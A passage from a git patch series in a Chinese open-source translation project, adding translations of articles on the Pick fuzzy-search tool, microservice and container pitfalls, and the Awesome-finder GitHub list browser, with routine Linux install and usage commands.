-[8]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_001-3.png ()
-[9]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_002-1.png ()
-[10]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_004-1.png ()
-[11]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_005.png ()
-[12]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_006-1.png ()
-[13]:https://github.com/calleerlandsson/pick.vim/
diff --git a/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md b/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
new file mode 100644
index 0000000000..9d16aaf1aa
--- /dev/null
+++ b/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
@@ -0,0 +1,138 @@
+Pick - 一款 Linux 上的命令行模糊搜索工具
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/search-720x340.jpg)
+
+今天,我们要讲的是一款有趣的命令行工具,名叫 `Pick`。它允许用户通过 ncurses(3X) 界面来从一系列选项中进行选择,而且还支持模糊搜索的功能。当你想要选择某个名字中包含非英文字符的目录或文件时,这款工具就很有用了。你根本都无需学习如何输入非英文字符。借助 Pick,你可以很方便地进行搜索,选择,然后浏览该文件或进入该目录。你甚至无需输入任何字符来过滤文件/目录。这很适合那些有大量目录和文件的人来用。
+
+### Pick - 一款 Linux 上的命令行模糊搜索工具
+
+#### 安装 Pick
+
+对 **Arch Linux** 及其衍生品来说,pick 放在 [**AUR**][1] 中。因此 Arch 用户可以使用类似 [**Pacaur**][2],[**Packer**][3],以及 [**Yaourt**][4] 等 AUR 辅助工具来安装它。
+```
+pacaur -S pick
+```
+
+或者,
+```
+packer -S pick
+```
+
+或者,
+```
+yaourt -S pick
+```
+
+**Debian**,**Ubuntu**,**Linux Mint** 用户则可以通过运行下面命令来安装 Pick。
+```
+sudo apt-get install pick
+```
+
+其他的发行版则可以从[**这里 **][5] 下载最新的安装包,然后按照下面的步骤来安装。在写本指南时,其最新版为 1.9.0。
+```
+wget https://github.com/calleerlandsson/pick/releases/download/v1.9.0/pick-1.9.0.tar.gz
+tar -zxvf pick-1.9.0.tar.gz
+cd pick-1.9.0/
+```
+
+使用下面命令进行配置:
+```
+./configure
+```
+
+最后,构建并安装 pick:
+```
+make
+sudo make install
+```
+
+#### 用法
+
+通过将它与其他命令集成能够大幅简化你的工作。我这里会给出一些例子,让你理解它是怎么工作的。
+
+让们先创建一堆目录。
+```
+mkdir -p abcd/efgh/ijkl/mnop/qrst/uvwx/yz/
+```
+
+现在,你想进入目录 `/ijkl/`。你有两种选择。可以使用 **cd** 命令:
+```
+cd abcd/efgh/ijkl/
+```
+
+或者,创建一个[**快捷方式 **][6] 或者说别名指向这个目录,这样你可以迅速进入该目录。
+
+但,使用 "pick" 命令则问题变得简单的多。看下面这个例子。
+```
+cd $(find . -type d | pick)
+```
+
+这个命令会列出当前工作目录下的所有目录及其子目录,你可以用上下箭头选择你想进入的目录,然后按下回车就行了。
+
+**像这样:**
+
+[![][7]][8]
+
+而且,它还会根据你输入的内容过滤目录和文件。比如,当我输入 “or” 时会显示如下结果。
+
+[![][7]][9]
+
+这只是一个例子。你也可以将 “pick” 命令跟其他命令一起混用。
+
+这是另一个例子。
+```
+find -type f | pick | xargs less
+```
+
+该命令让你选择当前目录中的某个文件并用 less 来查看它。
+
+[![][7]][10]
+
+还想看其他例子?还有呢。下面命令让你选择当前目录下的文件或目录,并将之迁移到其他地方去,比如这里我们迁移到 **/home/sk/ostechnix**。
+```
+mv "$(find . -maxdepth 1 |pick)" /home/sk/ostechnix/
+```
+
+[![][7]][11]
+
+通过上下按钮选择要迁移的文件,然后按下回车就会把它迁移到 `/home/sk/ostechnix/` 目录中的。
+
+[![][7]][12]
+
+从上面的结果中可以看到,我把一个名叫 “abcd” 的目录移动到 "ostechnix" 目录中了。
+
+使用案例是无限的。甚至 Vim 编辑器上还有一个叫做 [**pick.vim**][13] 的插件让你在 Vim 中选择更加方便。
+
+要查看详细信息,请参阅它的 man 页。
+```
+man pick
+```
+
+我们的讲解至此就结束了。希望这狂工具能给你们带来帮助。如果你觉得我们的指南有用的话,请将它分享到您的社交网络上,并向大家推荐 OSTechNix 博客。
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/pick-commandline-fuzzy-search-tool-linux/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://aur.archlinux.org/packages/pick/
+[2]:https://www.ostechnix.com/install-pacaur-arch-linux/
+[3]:https://www.ostechnix.com/install-packer-arch-linux-2/
+[4]:https://www.ostechnix.com/install-yaourt-arch-linux/
+[5]:https://github.com/calleerlandsson/pick/releases/
+[6]:https://www.ostechnix.com/create-shortcuts-frequently-used-directories-shell/
+[7]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_001-3.png ()
+[9]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_002-1.png ()
+[10]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_004-1.png ()
+[11]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_005.png ()
+[12]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_006-1.png ()
+[13]:https://github.com/calleerlandsson/pick.vim/
From a4c49d81fb139992f81498f52cc8ca78e2b40a62 Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Wed, 10 Jan 2018 17:25:08 +0800
Subject: [PATCH 216/371] Translated by qhwdw
---
...ces and containers- 5 pitfalls to avoid.md | 81 -------------------
...ces and containers- 5 pitfalls to avoid.md | 78 ++++++++++++++++++
2 files changed, 78 insertions(+), 81 deletions(-)
delete mode 100644 sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
create mode 100644 translated/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
diff --git a/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md b/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
deleted file mode 100644
index bb92793601..0000000000
--- a/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
+++ /dev/null
@@ -1,81 +0,0 @@
-Translating by qhwdw
-Microservices and containers: 5 pitfalls to avoid
-======
-
-![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO%20Containers%20Ecosystem.png?itok=lDTaYXzk)
-
-Because microservices and containers are a [match made in heaven][1], it might seem like nothing could go wrong. Let's get these babies into production as quickly as possible, then kick back and wait for the IT promotions and raises to start flooding in. Right?
-
-(We'll pause while the laughter subsides.)
-
-Yeah, sorry. That's just not how it works. While the two technologies can be a powerful combination, realizing their potential doesn't happen without some effort and planning. In previous posts, we've tackled what you should [know at the start][2]. But what about the most common problems organizations encounter when they run microservices in containers?
-
-Knowing these potential snafus in advance can help you avoid them and lay a more solid foundation for success.
-
-It starts with being realistic about your organization's needs, knowledge, resources, and more. "One common [mistake] is to try to adopt everything at once," says Mac Browning, engineering manager at [DigitalOcean][3]. "Be realistic about how your company adopts containers and microservices."
-
-**[ Struggling to explain microservices to your bosses and colleagues? Read our primer on[how to explain microservices in plain English][4]. ]**
-
-Browning and other IT pros shared five pitfalls they see organizations encounter with containerized microservices, especially early in their production lifespan. Knowing them will help you develop your own realistic organizational assessment as you build your strategy for microservices and containers.
-
-### 1. Trying to learn both from scratch simultaneously
-
-If you're just starting to move away from 100% monolithic applications, or if your organization doesn't already a deep knowledge base for containers or microservices, remember this: Microservices and containers aren't actually tethered to one another. That means you can develop your in-house expertise with one before adding the other. Kevin McGrath, senior CTO architect at [Sungard Availability Services][5], recommends building up your team's knowledge and skills with containers first, by containerizing existing or new applications, and then moving to a microservices architecture where beneficial in a later phase.
-
-"Companies that run microservices extremely well got there through years of iteration that gave them the ability to move fast," McGrath says. "If the organization cannot move fast, microservices are going to be difficult to support. Learn to move fast, which containers can help with, then worry about killing the monolith."
-
-### 2. Starting with a customer-facing or mission-critical application
-
-A related pitfall for organizations just getting started with containers, microservices, or both: Trying to tame the lion in the monolithic jungle before you've gotten some practice with some animals lower on the food chain.
-
-Expect some missteps along your team's learning curve - do you want those made with a critical customer-facing application or, say, a lower-stakes service visible only to IT or other internal teams?
-
-"If the entire ecosystem is new, then adding their use into lower-impact areas like your continuous integration system or internal tools may be a low-risk way to gain some operational expertise [with containers and microservices," says Browning of DigitalOcean. "As you gain experience, you'll naturally find new places you can leverage these technologies to deliver a better product to your customers. The fact is, things will go wrong, so plan for them in advance."
-
-### 3. Introducing too much complexity without the right team in place
-
-As your microservices architecture scales, it can generate complex management needs.
-
-As [Red Hat][6] technology evangelist [Gordon Haff][7] recetly wrote, "An OCI-compliant container runtime by itself is very good at managing single containers. However, when you start using more and more containers and containerized apps, broken down into hundreds of pieces, management and orchestration gets tricky. Eventually, you need to take a step back and group containers to deliver services - such as networking, security, and telemetry - across your containers."
-
-"Furthermore, because containers are portable, it's important that the management stack that's associated with them be portable as well," Haff notes. "That's where orchestration technologies like [Kubernetes][8] come in, simplifying this need for IT." (See the full article by Haff: [5 advantages of containers for writing applications][1]. )
-
-In addition, you need the right team in place. If you're already a [DevOps shop][9], you might be particularly well-suited for the transition. Regardless, put a cross-section of people at the table from the start.
-
-"As more services get deployed overtime, it can become unwieldy to manage," says Mike Kavis, VP and principal cloud architect at [Cloud Technology Partners][10]. "In the true essence of DevOps, make sure that all domain experts - dev, test, security, ops, etc. - are participating up front and collaborating on the best ways to build, deploy, run, and secure container-based microservices.
-
-### 4. Ignoring automation as a table-stakes requirement
-
-In addition to the having the right team, organizations that have the most success with container-based microservices tend to tackle the inherent complexity with an "automate as much as possible" mindset.
-
-"Distributed architectures are not easy, and elements like data persistence, logging, and debugging can get really complex in microservice architectures," says Carlos Sanchez, senior software engineer at [CloudBees][11], of some of the common challenges. By definition, those distributed architectures that Sanchez mentions will become a Herculean operational chore as they grow. "The proliferation of services and components makes automation a requirement," Sanchez advises. "Manual management will not scale."
-
-### 5. Letting microservices fatten up over time
-
-Running a service or software component in a container isn't magic. Doing so does not guarantee that, voila, you've got a microservice. Manual Nedbal, CTO at [ShieldX Networks][12], notes that IT pros need to ensure their microservices stay microservices over time.
-
-"Some software components accumulate lots of code and features over time. Putting them into a container does not necessarily generate microservices and may not yield the same benefits," Nedbal says. "Also, as components grow in size, engineers need to be watchful for opportunities to break up evolving monoliths again."
-
---------------------------------------------------------------------------------
-
-via: https://enterprisersproject.com/article/2017/9/using-microservices-containers-wisely-5-pitfalls-avoid
-
-作者:[Kevin Casey][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://enterprisersproject.com/user/kevin-casey
-[1]:https://enterprisersproject.com/article/2017/8/5-advantages-containers-writing-applications
-[2]:https://enterprisersproject.com/article/2017/9/microservices-and-containers-6-things-know-start-time
-[3]:https://www.digitalocean.com/
-[4]:https://enterprisersproject.com/article/2017/8/how-explain-microservices-plain-english?sc_cid=70160000000h0aXAAQ
-[5]:https://www.sungardas.com/
-[6]:https://www.redhat.com/en
-[7]:https://enterprisersproject.com/user/gordon-haff
-[8]:https://www.redhat.com/en/containers/what-is-kubernetes
-[9]:https://enterprisersproject.com/article/2017/8/devops-jobs-how-spot-great-devops-shop
-[10]:https://www.cloudtp.com/
-[11]:https://www.cloudbees.com/
-[12]:https://www.shieldx.com/
diff --git a/translated/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md b/translated/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
new file mode 100644
index 0000000000..eb556dd301
--- /dev/null
+++ b/translated/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
@@ -0,0 +1,78 @@
+微服务和容器:需要去防范的 5 个“坑”
+======
+
+![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO%20Containers%20Ecosystem.png?itok=lDTaYXzk)
+
+因为微服务和容器是 [天生的“一对”][1],所以一起来使用它们,似乎也就不会有什么问题。当我们将这对“天作之合”投入到生产系统后,你就会发现,随着你的 IT 基础的提升,等待你的将是大幅上升的成本。是不是这样的?
+
+是的,很遗憾,这并不是你所希望的结果。虽然这两种技术的组合是非常强大的,但是,如果没有很好的规划和适配,它们并不能发挥出强大的性能来。在前面的文章中,我们整理了如果你想 [使用它们你应该掌握的知识][2]。但是,那些都是组织在容器中使用微服务时所遇到的常见问题。
+
+事先了解这些可能出现的问题,可以为你的成功奠定更坚实的基础。
+
+微服务和容器技术的出现是基于组织的需要、知识、资源等等更多的现实的要求。Mac Browning 说,“他们最常犯的一个 [错误] 是试图一次就想“搞定”一切”,他是 [DigitalOcean][3] 的工程部经理。“而真正需要面对的问题是,你的公司应该采用什么样的容器和微服务。”
+
+**[ 努力向你的老板和同事去解释什么是微服务?阅读我们的入门读本[如何简单明了地解释微服务][4]。]**
+
+Browning 和其他的 IT 专业人员分享了他们遇到的,在组织中使用容器化微服务时的五个陷阱,特别是在他们的生产系统生命周期的早期时候。在你的组织中需要去部署微服务和容器时,了解这些知识,将有助于你去评估微服务和容器化的部署策略。
+
+### 1. 在部署微服务和容器化上,试图同时从零开始
+
+如果你刚开始从完全的实体服务器上开始改变,或者如果你的组织在微服务和容器化上还没有足够的知识储备,那么,请记住:微服务和容器化并不是拴在一起,不可分别部署的。这就意味着,你可以发挥你公司内部专家的技术特长,先从部署其中的一个开始。Kevin McGrath,CTO, [Sungard 服务可用性][5] 资深设计师,他建议,通过首先使用容器化来为你的团队建立知识和技能储备,通过对现有应用或者新应用进行容器化部署,接着再将它们迁移到微服务架构,这样才能在最后的阶段感受到它们的优势所在。
+
+McGrath 说,“微服务要想运行的很好,需要公司经过多年的反复迭代,这样才能实现快速部署和迁移”,“如果组织不能实现快速迁移,那么支持微服务将很困难。实现快速迁移,容器化可以帮助你,这样就不用担心业务整体停机”
+
+### 2. 从一个面向客户的或者关键的业务应用开始
+
+对组织来说,一个相关陷阱恰恰就是引入容器、微服务、或者同时两者都引入的这个开端:在尝试征服一片丛林中的雄狮之前,你应该先去征服处于食物链底端的一些小动物,以取得一些实践经验。
+
+在你的学习过程中预期会有一些错误出现 - 你是希望这些错误发生在面向客户的关键业务应用上,还是,仅对 IT 或者其他内部团队可见的低风险应用上?
+
+DigitalOcean 的 Browning 说,“如果整个生态系统都是新的,为了获取一些微服务和容器方面的操作经验,那么,将它们先应用到影响面较低的区域,比如像你的持续集成系统或者内部工具,可能是一个低风险的做法。”你获得这方面的经验以后,当然会将这些技术应用到为客户提供服务的生产系统上。而现实情况是,不论你准备的如何周全,都不可避免会遇到问题,因此,需要提前为可能出现的问题制定应对之策。
+
+### 3. 在没有合适的团队之前引入了太多的复杂性
+
+由于微服务架构的弹性,它可能会产生复杂的管理需求。
+
+作为 [Red Hat][6] 技术的狂热拥护者,[Gordon Haff][7] 最近写道,“一个符合 OCI 标准的容器运行时本身管理单个容器是很擅长的,但是,当你开始使用多个容器和容器化应用时,并将它们分解为成百上千个节点后,管理和编配它们将变得极为复杂。最终,你将回过头来需要将容器分组来提供服务 - 比如,跨容器的网络、安全、测控”
+
+Haff 提示说,“幸运的是,由于容器是可移植的,并且,与之相关的管理栈也是可移植的”。“这时出现的编配技术,比如像 [Kubernetes][8] ,使得这种 IT 需求变得简单化了”(更多内容请查阅 Haff 的文章:[容器化为编写应用带来的 5 个优势][1])
+
+另外,你需要合适的团队去做这些事情。如果你已经有 [DevOps shop][9],那么,你可能比较适合做这种转换。因为,从一开始你已经聚集了相关技能的人才。
+
+Mike Kavis 说,“随着时间的推移,会有越来越多的服务得以部署,管理起来会变得很不方便”,他是 [Cloud Technology Partners][10] 的副总裁兼首席云架构设计师。他说,“在 DevOps 的关键过程中,确保各个领域的专家 - 开发、测试、安全、运营等等 - 全部者参与进来,并且在基于容器的微服务中,在构建、部署、运行、安全方面实现协作。”
+
+### 4. 忽视重要的需求:自动化
+
+除了具有一个合适的团队之外,那些在基于容器化的微服务部署比较成功的组织都倾向于以“实现尽可能多的自动化”来解决固有的复杂性。
+
+Carlos Sanchez 说,“实现分布式架构并不容易,一些常见的挑战,像数据持久性、日志、排错等等,在微服务架构中都会变得很复杂”,他是 [CloudBees][11] 的资深软件工程师。根据定义,Sanchez 提到的分布式架构,随着业务的增长,将变成一个巨大无比的繁重的运营任务。“服务和组件的增殖,将使得运营自动化变成一项非常强烈的需求”。Sanchez 警告说。“手动管理将限制服务的规模”
+
+### 5. 随着时间的推移,微服务变得越来越臃肿
+
+在一个容器中运行一个服务或者软件组件并不神奇。但是,这样做并不能证明你就一定在使用微服务。Manual Nedbal, [ShieldX Networks][12] 的 CTO,它警告说,IT 专业人员要确保,随着时间的推移,微服务仍然是微服务。
+
+Nedbal 说,“随着时间的推移,一些软件组件积累了大量的代码和特性,将它们将在一个容器中将会产生并不需要的微服务,也不会带来相同的优势”,也就是说,“随着组件的变大,工程师需要找到合适的时机将它们再次分解”
+
+--------------------------------------------------------------------------------
+
+via: https://enterprisersproject.com/article/2017/9/using-microservices-containers-wisely-5-pitfalls-avoid
+
+作者:[Kevin Casey][a]
+译者:[qhwdw](https://github.com/qhwdw)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://enterprisersproject.com/user/kevin-casey
+[1]:https://enterprisersproject.com/article/2017/8/5-advantages-containers-writing-applications
+[2]:https://enterprisersproject.com/article/2017/9/microservices-and-containers-6-things-know-start-time
+[3]:https://www.digitalocean.com/
+[4]:https://enterprisersproject.com/article/2017/8/how-explain-microservices-plain-english?sc_cid=70160000000h0aXAAQ
+[5]:https://www.sungardas.com/
+[6]:https://www.redhat.com/en
+[7]:https://enterprisersproject.com/user/gordon-haff
+[8]:https://www.redhat.com/en/containers/what-is-kubernetes
+[9]:https://enterprisersproject.com/article/2017/8/devops-jobs-how-spot-great-devops-shop
+[10]:https://www.cloudtp.com/
+[11]:https://www.cloudbees.com/
+[12]:https://www.shieldx.com/
From 7a448de6c0fcd5de451f64ae0ca1c0f86832ba32 Mon Sep 17 00:00:00 2001
From: darksun
Date: Wed, 10 Jan 2018 19:03:09 +0800
Subject: [PATCH 217/371] translate done: 20170927 How To Easily Find Awesome
Projects And Resources Hosted In GitHub.md
---
...Projects And Resources Hosted In GitHub.md | 159 ------------------
...Projects And Resources Hosted In GitHub.md | 155 +++++++++++++++++
2 files changed, 155 insertions(+), 159 deletions(-)
delete mode 100644 sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
create mode 100644 translated/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
diff --git a/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md b/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
deleted file mode 100644
index efdfc35ee3..0000000000
--- a/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
+++ /dev/null
@@ -1,159 +0,0 @@
-translating by lujun9972
-How To Easily Find Awesome Projects And Resources Hosted In GitHub
-======
-![](https://www.ostechnix.com/wp-content/uploads/2017/09/Awesome-finder-Find-Awesome-Projects-720x340.png)
-
-Everyday there are hundreds of new additions to the **GitHub** website. Since GitHub has thousands of stuffs, you would be exhausted when searching for a good project. Fortunately, a group of contributors have made a curated lists of awesome stuffs hosted in GitHub. These lists contains a lot of awesome stuffs grouped under different categories such as programming, database, editors, gaming, entertainment and many more. It makes our life much easier to find out any project, software, resource, library, books and all other stuffs hosted in GitHub. A fellow GitHub user went one step ahead and created a command-line utility called **" Awesome-finder"** to find awesome projects and resources on awesome series repositories. This utility helps us to browse through the curated list of awesome lists without leaving the Terminal, without using browser of course.
-
-In this brief guide, I will show you how to easily browse through the curated list of awesome lists in Unix-like systems.
-
-### Awesome-finder - Easily Find Awesome Projects And Resources Hosted In GitHub
-
-#### Installing Awesome-finder
-
-Awesome can be easily installed using **pip** , a package manager for installing programs developed using Python programming language.
-
-On **Arch Linux** and its derivatives like **Antergos** , **Manjaro Linux** , you can install pip using command:
-```
-sudo pacman -S python-pip
-```
-
-On **RHEL** , **CentOS** :
-```
-sudo yum install epel-release
-```
-```
-sudo yum install python-pip
-```
-
-On **Fedora** :
-```
-sudo dnf install epel-release
-```
-```
-sudo dnf install python-pip
-```
-
-On **Debian** , **Ubuntu** , **Linux Mint** :
-```
-sudo apt-get install python-pip
-```
-
-On **SUSE** , **openSUSE** :
-```
-sudo zypper install python-pip
-```
-
-Once PIP installed, run the following command to install 'Awesome-finder' utility.
-```
-sudo pip install awesome-finder
-```
-
-#### Usage
-
-Awesome-finder currently lists the stuffs from the following awesome topics (repositories, of course) from GitHub site:
-
- * awesome
- * awesome-android
- * awesome-elixir
- * awesome-go
- * awesome-ios
- * awesome-java
- * awesome-javascript
- * awesome-php
- * awesome-python
- * awesome-ruby
- * awesome-rust
- * awesome-scala
- * awesome-swift
-
-
-
-This list will be updated on regular basis.
-
-For instance, to view the curated list from awesome-go repository, just type:
-```
-awesome go
-```
-
-You will see all popular stuffs written using "Go", sorted by alphabetical order.
-
-[![][1]][2]
-
-You can navigate through the list using **UP/DOWN** arrows. Once you found the stuff you looking for, choose it and hit **ENTER** key to open the link in your default web browser.
-
-Similarly,
-
- * "awesome android" command will search the **awesome-android** repository.
- * "awesome awesome" command will search the **awesome** repository.
- * "awesome elixir" command will search the **awesome-elixir**.
- * "awesome go" will search the **awesome-go**.
- * "awesome ios" will search the **awesome-ios**.
- * "awesome java" will search the **awesome-java**.
- * "awesome javascript" will search the **awesome-javascript**.
- * "awesome php" will search the **awesome-php**.
- * "awesome python" will search the **awesome-python**.
- * "awesome ruby" will search the **awesome-ruby**.
- * "awesome rust" will search the **awesome-rust**.
- * "awesome scala" will search the **awesome-scala**.
- * "awesome swift" will search the **awesome-swift**.
-
-
-
-Also, it automatically displays the suggestions as you type in the prompt. For instance when I type "dj", it displays the stuffs related to Django.
-
-[![][1]][3]
-
-If you wanted to find the awesome things from latest awesome- (not use cache), use -f or -force flag:
-```
-awesome -f (--force)
-
-```
-
-**Example:**
-```
-awesome python -f
-```
-
-Or,
-```
-awesome python --force
-```
-
-The above command will display the curated list of stuffs from **awesome-python** GitHub repository.
-
-Awesome, isn't it?
-
-To exit from this utility, press **ESC** key. To display help, type:
-```
-awesome -h
-```
-
-And, that's all for now. Hope this helps. If you find our guides useful, please share them on your social, professional networks, so everyone will benefit from them. Good good stuffs to come. Stay tuned!
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/
-
-作者:[SK][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com/author/sk/
-[1]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
-[2]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_008-1.png ()
-[3]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_009.png ()
-[4]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=reddit (Click to share on Reddit)
-[5]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=twitter (Click to share on Twitter)
-[6]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=facebook (Click to share on Facebook)
-[7]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=google-plus-1 (Click to share on Google+)
-[8]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=linkedin (Click to share on LinkedIn)
-[9]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=pocket (Click to share on Pocket)
-[10]:whatsapp://send?text=How%20To%20Easily%20Find%20Awesome%20Projects%20And%20Resources%20Hosted%20In%20GitHub%20https%3A%2F%2Fwww.ostechnix.com%2Feasily-find-awesome-projects-resources-hosted-github%2F (Click to share on WhatsApp)
-[11]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=telegram (Click to share on Telegram)
-[12]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=email (Click to email this to a friend)
-[13]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/#print (Click to print)
diff --git a/translated/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md b/translated/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
new file mode 100644
index 0000000000..80566a8ae0
--- /dev/null
+++ b/translated/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
@@ -0,0 +1,155 @@
+如何方便地寻找 GitHub 上超棒的项目和资源
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/Awesome-finder-Find-Awesome-Projects-720x340.png)
+
+在 **GitHub** 网站上每天都会新增上百个项目。由于 GitHub 上有成千上万的项目,要在上面搜索好的项目简直要累死人。好在,有那么一伙人已经创建了一些这样的列表。其中包含的类别五花八门,如编程,数据库,编辑器,游戏,娱乐等。这使得我们寻找在 GitHub 上托管的项目,软件,资源,裤,书籍等其他东西变得容易了很多。有一个 GitHub 用户更进了一步,创建了一个名叫 `Awesome-finder` 的命令行工具,用来在 awesome 系列的仓库中寻找超棒的项目和资源。该工具帮助我们不需要离开终端(当然也就不需要使用浏览器了)的情况下浏览 awesome 列表。
+
+在这篇简单的说明中,我会向你演示如何方便地在类 Unix 系统中浏览 awesome 列表。
+
+### Awesome-finder - 方便地寻找 GitHub 上超棒的项目和资源
+
+#### 安装 Awesome-finder
+
+使用 `pip` 可以很方便地安装该工具,`pip` 是一个用来安装使用 Python 编程语言开发的程序的包管理器。
+
+在 **Arch Linux** 一起衍生发行版中(比如 **Antergos**,**Manjaro Linux**),你可以使用下面命令安装 `pip`:
+```
+sudo pacman -S python-pip
+```
+
+在 **RHEL**,**CentOS** 中:
+```
+sudo yum install epel-release
+```
+```
+sudo yum install python-pip
+```
+
+在 **Fedora** 上:
+```
+sudo dnf install epel-release
+```
+```
+sudo dnf install python-pip
+```
+
+在 **Debian**,**Ubuntu**,**Linux Mint** 上:
+```
+sudo apt-get install python-pip
+```
+
+在 **SUSE**,**openSUSE** 上:
+```
+sudo zypper install python-pip
+```
+
+PIP 安装好后,用下面命令来安装 'Awesome-finder'。
+```
+sudo pip install awesome-finder
+```
+
+#### 用法
+
+Awesome-finder 会列出 GitHub 网站中如下这些主题(其实就是仓库)的内容:
+
+ * awesome
+ * awesome-android
+ * awesome-elixir
+ * awesome-go
+ * awesome-ios
+ * awesome-java
+ * awesome-javascript
+ * awesome-php
+ * awesome-python
+ * awesome-ruby
+ * awesome-rust
+ * awesome-scala
+ * awesome-swift
+
+
+该列表会定期更新。
+
+比如,要查看 `awesome-go` 仓库中的列表,只需要输入:
+```
+awesome go
+```
+
+你就能看到用 “Go” 写的所有流行的东西了,而且这些东西按字母顺序进行了排列。
+
+[![][1]][2]
+
+你可以通过 **上/下** 箭头在列表中导航。一旦找到所需要的东西,只需要选中它,然后按下 **回车** 键就会用你默认的 web 浏览器打开相应的链接了。
+
+类似的,
+
+ * "awesome android" 命令会搜索 **awesome-android** 仓库。
+ * "awesome awesome" 命令会搜索 **awesome** 仓库。
+ * "awesome elixir" 命令会搜索 **awesome-elixir**。
+ * "awesome go" 命令会搜索 **awesome-go**。
+ * "awesome ios" 命令会搜索 **awesome-ios**。
+ * "awesome java" 命令会搜索 **awesome-java**。
+ * "awesome javascript" 命令会搜索 **awesome-javascript**。
+ * "awesome php" 命令会搜索 **awesome-php**。
+ * "awesome python" 命令会搜索 **awesome-python**。
+ * "awesome ruby" 命令会搜索 **awesome-ruby**。
+ * "awesome rust" 命令会搜索 **awesome-rust**。
+ * "awesome scala" 命令会搜索 **awesome-scala**。
+ * "awesome swift" 命令会搜索 **awesome-swift**。
+
+而且,它还会随着你在提示符中输入的内容而自动进行筛选。比如,当我输入 "dj" 后,他会显示与 Django 相关的内容。
+
+[![][1]][3]
+
+若你想从最新的 `awesome-`( 而不是用缓存中的数据) 中搜索,使用 `-f` 或 `-force` 标志:
+```
+awesome -f (--force)
+
+```
+
+**像这样:**
+```
+awesome python -f
+```
+
+或,
+```
+awesome python --force
+```
+
+上面命令会显示 **awesome-python** GitHub 仓库中的列表。
+
+很棒,对吧?
+
+要退出这个工具的话,按下 **ESC** 键。要显示帮助信息,输入:
+```
+awesome -h
+```
+
+本文至此就结束了。希望本文能对你产生帮助。如果你觉得我们的文章对你有帮助,请将他们分享到你的社交网络中去,造福大众。我们马上还有其他好东西要来了。敬请期待!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
